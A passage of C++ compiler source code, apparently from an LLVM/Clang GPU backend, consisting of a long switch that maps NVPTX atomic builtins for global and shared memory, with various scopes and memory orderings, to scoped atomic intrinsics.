case NVPTX::BI__nvvm_atom_acq_rel_min_global_ul:
case NVPTX::BI__nvvm_atom_acq_rel_min_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_ui_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_inc_global_ui:
case NVPTX::BI__nvvm_atom_acq_rel_inc_global_ul:
case NVPTX::BI__nvvm_atom_acq_rel_inc_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_global_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_dec_global_ui:
case NVPTX::BI__nvvm_atom_acq_rel_dec_global_ul:
case NVPTX::BI__nvvm_atom_acq_rel_dec_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_global_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_and_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_and_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_and_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_global_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_or_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_or_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_or_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_global_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_xor_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_xor_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_xor_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_global_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_cas_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_cas_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_cas_global_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_global_i_acq_rel);
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_global_f:
case NVPTX::BI__nvvm_atom_acq_rel_cta_add_global_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_f_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_global_f:
case NVPTX::BI__nvvm_atom_acq_rel_sys_add_global_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_global_f_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_xchg_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_xchg_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_xchg_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_global_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_xchg_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_xchg_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_xchg_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_global_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_global_ui:
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_global_ul:
case NVPTX::BI__nvvm_atom_acq_rel_cta_max_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_ui_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_global_ui:
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_global_ul:
case NVPTX::BI__nvvm_atom_acq_rel_sys_max_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_global_ui_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_global_ui:
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_global_ul:
case NVPTX::BI__nvvm_atom_acq_rel_cta_min_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_ui_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_global_ui:
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_global_ul:
case NVPTX::BI__nvvm_atom_acq_rel_sys_min_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_global_ui_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_inc_global_ui:
case NVPTX::BI__nvvm_atom_acq_rel_cta_inc_global_ul:
case NVPTX::BI__nvvm_atom_acq_rel_cta_inc_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_global_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_cta_dec_global_ui:
case NVPTX::BI__nvvm_atom_acq_rel_cta_dec_global_ul:
case NVPTX::BI__nvvm_atom_acq_rel_cta_dec_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_global_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_inc_global_ui:
case NVPTX::BI__nvvm_atom_acq_rel_sys_inc_global_ul:
case NVPTX::BI__nvvm_atom_acq_rel_sys_inc_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_global_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_sys_dec_global_ui:
case NVPTX::BI__nvvm_atom_acq_rel_sys_dec_global_ul:
case NVPTX::BI__nvvm_atom_acq_rel_sys_dec_global_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_global_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_and_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_and_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_and_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_global_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_and_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_and_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_and_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_global_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_or_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_or_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_or_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_global_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_or_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_or_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_or_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_global_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_xor_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_xor_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_xor_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_global_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_xor_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_xor_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_xor_global_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_global_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_acq_rel_cta_cas_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_cta_cas_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_cta_cas_global_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_global_i_acq_rel_cta);
case NVPTX::BI__nvvm_atom_acq_rel_sys_cas_global_i:
case NVPTX::BI__nvvm_atom_acq_rel_sys_cas_global_l:
case NVPTX::BI__nvvm_atom_acq_rel_sys_cas_global_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_global_i_acq_rel_sys);
case NVPTX::BI__nvvm_atom_add_shared_i:
case NVPTX::BI__nvvm_atom_add_shared_l:
case NVPTX::BI__nvvm_atom_add_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_i);
case NVPTX::BI__nvvm_atom_add_shared_f:
case NVPTX::BI__nvvm_atom_add_shared_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_f);
case NVPTX::BI__nvvm_atom_xchg_shared_i:
case NVPTX::BI__nvvm_atom_xchg_shared_l:
case NVPTX::BI__nvvm_atom_xchg_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_shared_i);
case NVPTX::BI__nvvm_atom_max_shared_i:
case NVPTX::BI__nvvm_atom_max_shared_l:
case NVPTX::BI__nvvm_atom_max_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_i);
case NVPTX::BI__nvvm_atom_max_shared_ui:
case NVPTX::BI__nvvm_atom_max_shared_ul:
case NVPTX::BI__nvvm_atom_max_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_ui);
case NVPTX::BI__nvvm_atom_min_shared_i:
case NVPTX::BI__nvvm_atom_min_shared_l:
case NVPTX::BI__nvvm_atom_min_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_i);
case NVPTX::BI__nvvm_atom_min_shared_ui:
case NVPTX::BI__nvvm_atom_min_shared_ul:
case NVPTX::BI__nvvm_atom_min_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_ui);
case NVPTX::BI__nvvm_atom_inc_shared_ui:
case NVPTX::BI__nvvm_atom_inc_shared_ul:
case NVPTX::BI__nvvm_atom_inc_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_shared_i);
case NVPTX::BI__nvvm_atom_dec_shared_ui:
case NVPTX::BI__nvvm_atom_dec_shared_ul:
case NVPTX::BI__nvvm_atom_dec_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_shared_i);
case NVPTX::BI__nvvm_atom_and_shared_i:
case NVPTX::BI__nvvm_atom_and_shared_l:
case NVPTX::BI__nvvm_atom_and_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_shared_i);
case NVPTX::BI__nvvm_atom_or_shared_i:
case NVPTX::BI__nvvm_atom_or_shared_l:
case NVPTX::BI__nvvm_atom_or_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_shared_i);
case NVPTX::BI__nvvm_atom_xor_shared_i:
case NVPTX::BI__nvvm_atom_xor_shared_l:
case NVPTX::BI__nvvm_atom_xor_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_shared_i);
case NVPTX::BI__nvvm_atom_cas_shared_i:
case NVPTX::BI__nvvm_atom_cas_shared_l:
case NVPTX::BI__nvvm_atom_cas_shared_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_shared_i);
case NVPTX::BI__nvvm_atom_cta_add_shared_i:
case NVPTX::BI__nvvm_atom_cta_add_shared_l:
case NVPTX::BI__nvvm_atom_cta_add_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_i_cta);
case NVPTX::BI__nvvm_atom_sys_add_shared_i:
case NVPTX::BI__nvvm_atom_sys_add_shared_l:
case NVPTX::BI__nvvm_atom_sys_add_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_i_sys);
case NVPTX::BI__nvvm_atom_cta_add_shared_f:
case NVPTX::BI__nvvm_atom_cta_add_shared_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_f_cta);
case NVPTX::BI__nvvm_atom_sys_add_shared_f:
case NVPTX::BI__nvvm_atom_sys_add_shared_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_f_sys);
case NVPTX::BI__nvvm_atom_cta_xchg_shared_i:
case NVPTX::BI__nvvm_atom_cta_xchg_shared_l:
case NVPTX::BI__nvvm_atom_cta_xchg_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_shared_i_cta);
case NVPTX::BI__nvvm_atom_sys_xchg_shared_i:
case NVPTX::BI__nvvm_atom_sys_xchg_shared_l:
case NVPTX::BI__nvvm_atom_sys_xchg_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_shared_i_sys);
case NVPTX::BI__nvvm_atom_cta_max_shared_i:
case NVPTX::BI__nvvm_atom_cta_max_shared_l:
case NVPTX::BI__nvvm_atom_cta_max_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_i_cta);
case NVPTX::BI__nvvm_atom_cta_max_shared_ui:
case NVPTX::BI__nvvm_atom_cta_max_shared_ul:
case NVPTX::BI__nvvm_atom_cta_max_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_ui_cta);
case NVPTX::BI__nvvm_atom_sys_max_shared_i:
case NVPTX::BI__nvvm_atom_sys_max_shared_l:
case NVPTX::BI__nvvm_atom_sys_max_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_i_sys);
case NVPTX::BI__nvvm_atom_sys_max_shared_ui:
case NVPTX::BI__nvvm_atom_sys_max_shared_ul:
case NVPTX::BI__nvvm_atom_sys_max_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_ui_sys);
case NVPTX::BI__nvvm_atom_cta_min_shared_i:
case NVPTX::BI__nvvm_atom_cta_min_shared_l:
case NVPTX::BI__nvvm_atom_cta_min_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_i_cta);
case NVPTX::BI__nvvm_atom_cta_min_shared_ui:
case NVPTX::BI__nvvm_atom_cta_min_shared_ul:
case NVPTX::BI__nvvm_atom_cta_min_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_ui_cta);
case NVPTX::BI__nvvm_atom_sys_min_shared_i:
case NVPTX::BI__nvvm_atom_sys_min_shared_l:
case NVPTX::BI__nvvm_atom_sys_min_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_i_sys);
case NVPTX::BI__nvvm_atom_sys_min_shared_ui:
case NVPTX::BI__nvvm_atom_sys_min_shared_ul:
case NVPTX::BI__nvvm_atom_sys_min_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_ui_sys);
case NVPTX::BI__nvvm_atom_cta_inc_shared_ui:
case NVPTX::BI__nvvm_atom_cta_inc_shared_ul:
case NVPTX::BI__nvvm_atom_cta_inc_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_shared_i_cta);
case NVPTX::BI__nvvm_atom_cta_dec_shared_ui:
case NVPTX::BI__nvvm_atom_cta_dec_shared_ul:
case NVPTX::BI__nvvm_atom_cta_dec_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_shared_i_cta);
case NVPTX::BI__nvvm_atom_sys_inc_shared_ui:
case NVPTX::BI__nvvm_atom_sys_inc_shared_ul:
case NVPTX::BI__nvvm_atom_sys_inc_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_shared_i_sys);
case NVPTX::BI__nvvm_atom_sys_dec_shared_ui:
case NVPTX::BI__nvvm_atom_sys_dec_shared_ul:
case NVPTX::BI__nvvm_atom_sys_dec_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_shared_i_sys);
case NVPTX::BI__nvvm_atom_cta_and_shared_i:
case NVPTX::BI__nvvm_atom_cta_and_shared_l:
case NVPTX::BI__nvvm_atom_cta_and_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_shared_i_cta);
case NVPTX::BI__nvvm_atom_sys_and_shared_i:
case NVPTX::BI__nvvm_atom_sys_and_shared_l:
case NVPTX::BI__nvvm_atom_sys_and_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_shared_i_sys);
case NVPTX::BI__nvvm_atom_cta_or_shared_i:
case NVPTX::BI__nvvm_atom_cta_or_shared_l:
case NVPTX::BI__nvvm_atom_cta_or_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_shared_i_cta);
case NVPTX::BI__nvvm_atom_sys_or_shared_i:
case NVPTX::BI__nvvm_atom_sys_or_shared_l:
case NVPTX::BI__nvvm_atom_sys_or_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_shared_i_sys);
case NVPTX::BI__nvvm_atom_cta_xor_shared_i:
case NVPTX::BI__nvvm_atom_cta_xor_shared_l:
case NVPTX::BI__nvvm_atom_cta_xor_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_shared_i_cta);
case NVPTX::BI__nvvm_atom_sys_xor_shared_i:
case NVPTX::BI__nvvm_atom_sys_xor_shared_l:
case NVPTX::BI__nvvm_atom_sys_xor_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_shared_i_sys);
case NVPTX::BI__nvvm_atom_cta_cas_shared_i:
case NVPTX::BI__nvvm_atom_cta_cas_shared_l:
case NVPTX::BI__nvvm_atom_cta_cas_shared_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_shared_i_cta);
case NVPTX::BI__nvvm_atom_sys_cas_shared_i:
case NVPTX::BI__nvvm_atom_sys_cas_shared_l:
case NVPTX::BI__nvvm_atom_sys_cas_shared_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_shared_i_sys);
case NVPTX::BI__nvvm_atom_acquire_add_shared_i:
case NVPTX::BI__nvvm_atom_acquire_add_shared_l:
case NVPTX::BI__nvvm_atom_acquire_add_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_add_shared_f:
case NVPTX::BI__nvvm_atom_acquire_add_shared_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_f_acquire);
case NVPTX::BI__nvvm_atom_acquire_xchg_shared_i:
case NVPTX::BI__nvvm_atom_acquire_xchg_shared_l:
case NVPTX::BI__nvvm_atom_acquire_xchg_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_shared_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_max_shared_i:
case NVPTX::BI__nvvm_atom_acquire_max_shared_l:
case NVPTX::BI__nvvm_atom_acquire_max_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_max_shared_ui:
case NVPTX::BI__nvvm_atom_acquire_max_shared_ul:
case NVPTX::BI__nvvm_atom_acquire_max_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_ui_acquire);
case NVPTX::BI__nvvm_atom_acquire_min_shared_i:
case NVPTX::BI__nvvm_atom_acquire_min_shared_l:
case NVPTX::BI__nvvm_atom_acquire_min_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_min_shared_ui:
case NVPTX::BI__nvvm_atom_acquire_min_shared_ul:
case NVPTX::BI__nvvm_atom_acquire_min_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_ui_acquire);
case NVPTX::BI__nvvm_atom_acquire_inc_shared_ui:
case NVPTX::BI__nvvm_atom_acquire_inc_shared_ul:
case NVPTX::BI__nvvm_atom_acquire_inc_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_shared_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_dec_shared_ui:
case NVPTX::BI__nvvm_atom_acquire_dec_shared_ul:
case NVPTX::BI__nvvm_atom_acquire_dec_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_shared_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_and_shared_i:
case NVPTX::BI__nvvm_atom_acquire_and_shared_l:
case NVPTX::BI__nvvm_atom_acquire_and_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_shared_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_or_shared_i:
case NVPTX::BI__nvvm_atom_acquire_or_shared_l:
case NVPTX::BI__nvvm_atom_acquire_or_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_shared_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_xor_shared_i:
case NVPTX::BI__nvvm_atom_acquire_xor_shared_l:
case NVPTX::BI__nvvm_atom_acquire_xor_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_shared_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_cas_shared_i:
case NVPTX::BI__nvvm_atom_acquire_cas_shared_l:
case NVPTX::BI__nvvm_atom_acquire_cas_shared_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_shared_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_cta_add_shared_i:
case NVPTX::BI__nvvm_atom_acquire_cta_add_shared_l:
case NVPTX::BI__nvvm_atom_acquire_cta_add_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_add_shared_i:
case NVPTX::BI__nvvm_atom_acquire_sys_add_shared_l:
case NVPTX::BI__nvvm_atom_acquire_sys_add_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_add_shared_f:
case NVPTX::BI__nvvm_atom_acquire_cta_add_shared_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_f_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_add_shared_f:
case NVPTX::BI__nvvm_atom_acquire_sys_add_shared_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_shared_f_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_xchg_shared_i:
case NVPTX::BI__nvvm_atom_acquire_cta_xchg_shared_l:
case NVPTX::BI__nvvm_atom_acquire_cta_xchg_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_shared_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_xchg_shared_i:
case NVPTX::BI__nvvm_atom_acquire_sys_xchg_shared_l:
case NVPTX::BI__nvvm_atom_acquire_sys_xchg_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_shared_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_max_shared_i:
case NVPTX::BI__nvvm_atom_acquire_cta_max_shared_l:
case NVPTX::BI__nvvm_atom_acquire_cta_max_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_cta_max_shared_ui:
case NVPTX::BI__nvvm_atom_acquire_cta_max_shared_ul:
case NVPTX::BI__nvvm_atom_acquire_cta_max_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_ui_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_max_shared_i:
case NVPTX::BI__nvvm_atom_acquire_sys_max_shared_l:
case NVPTX::BI__nvvm_atom_acquire_sys_max_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_sys_max_shared_ui:
case NVPTX::BI__nvvm_atom_acquire_sys_max_shared_ul:
case NVPTX::BI__nvvm_atom_acquire_sys_max_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_shared_ui_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_min_shared_i:
case NVPTX::BI__nvvm_atom_acquire_cta_min_shared_l:
case NVPTX::BI__nvvm_atom_acquire_cta_min_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_cta_min_shared_ui:
case NVPTX::BI__nvvm_atom_acquire_cta_min_shared_ul:
case NVPTX::BI__nvvm_atom_acquire_cta_min_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_ui_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_min_shared_i:
case NVPTX::BI__nvvm_atom_acquire_sys_min_shared_l:
case NVPTX::BI__nvvm_atom_acquire_sys_min_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_sys_min_shared_ui:
case NVPTX::BI__nvvm_atom_acquire_sys_min_shared_ul:
case NVPTX::BI__nvvm_atom_acquire_sys_min_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_shared_ui_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_inc_shared_ui:
case NVPTX::BI__nvvm_atom_acquire_cta_inc_shared_ul:
case NVPTX::BI__nvvm_atom_acquire_cta_inc_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_shared_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_cta_dec_shared_ui:
case NVPTX::BI__nvvm_atom_acquire_cta_dec_shared_ul:
case NVPTX::BI__nvvm_atom_acquire_cta_dec_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_shared_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_inc_shared_ui:
case NVPTX::BI__nvvm_atom_acquire_sys_inc_shared_ul:
case NVPTX::BI__nvvm_atom_acquire_sys_inc_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_shared_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_sys_dec_shared_ui:
case NVPTX::BI__nvvm_atom_acquire_sys_dec_shared_ul:
case NVPTX::BI__nvvm_atom_acquire_sys_dec_shared_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_shared_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_and_shared_i:
case NVPTX::BI__nvvm_atom_acquire_cta_and_shared_l:
case NVPTX::BI__nvvm_atom_acquire_cta_and_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_shared_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_and_shared_i:
case NVPTX::BI__nvvm_atom_acquire_sys_and_shared_l:
case NVPTX::BI__nvvm_atom_acquire_sys_and_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_shared_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_or_shared_i:
case NVPTX::BI__nvvm_atom_acquire_cta_or_shared_l:
case NVPTX::BI__nvvm_atom_acquire_cta_or_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_shared_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_or_shared_i:
case NVPTX::BI__nvvm_atom_acquire_sys_or_shared_l:
case NVPTX::BI__nvvm_atom_acquire_sys_or_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_shared_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_xor_shared_i:
case NVPTX::BI__nvvm_atom_acquire_cta_xor_shared_l:
case NVPTX::BI__nvvm_atom_acquire_cta_xor_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_shared_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_xor_shared_i:
case NVPTX::BI__nvvm_atom_acquire_sys_xor_shared_l:
case NVPTX::BI__nvvm_atom_acquire_sys_xor_shared_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_shared_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_cas_shared_i:
case NVPTX::BI__nvvm_atom_acquire_cta_cas_shared_l:
case NVPTX::BI__nvvm_atom_acquire_cta_cas_shared_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_shared_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_cas_shared_i:
case NVPTX::BI__nvvm_atom_acquire_sys_cas_shared_l:
case NVPTX::BI__nvvm_atom_acquire_sys_cas_shared_ll:
